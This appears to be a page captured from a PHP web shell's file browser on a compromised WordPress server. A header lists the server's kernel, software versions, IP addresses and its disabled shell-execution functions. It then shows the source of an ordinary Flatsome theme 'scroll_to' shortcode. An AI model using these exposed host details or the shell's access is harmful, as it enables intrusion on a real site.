Uname:
Linux baohanhelectrolux 6.8.0-138-generic #138-Ubuntu SMP PREEMPT_DYNAMIC Fri Jul 31 22:41:49 UTC 2026 x86_64
Software:
nginx/1.24.0
PHP version:
8.4.24 [ PHP INFO ] PHP os:
Linux
Server Ip:
103.90.227.231
Your Ip:
216.73.217.141
User:
www (1000) | Group:
www (1000)
Safe Mode:
OFF
Disable Function:
passthru,exec,system,putenv,chroot,chgrp,chown,shell_exec,popen,proc_open,pcntl_exec,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,imap_open,apache_setenv
<?php
function flatsome_scroll_to( $atts, $content = null ) {
extract( shortcode_atts( array(
'bullet' => 'true',
'title' => 'Change this',
'link' => '',
), $atts ) );
if ( ! $title && ! $link ) {
return false;
}
// Convert title to link if link is not set.
if ( ! $link ) {
$link = flatsome_to_dashed( $title );
}
if ( substr( $link, 0, 1 ) !== '#' ) {
$link = '#' . $link;
}
return '<span class="scroll-to" data-label="Scroll to: ' . $link . '" data-bullet="' . $bullet . '" data-link="' . $link . '" data-title="' . $title . '"><a name="' . str_replace( '#', '', $link ) . '"></a></span>';
}
add_shortcode( 'scroll_to', 'flatsome_scroll_to' );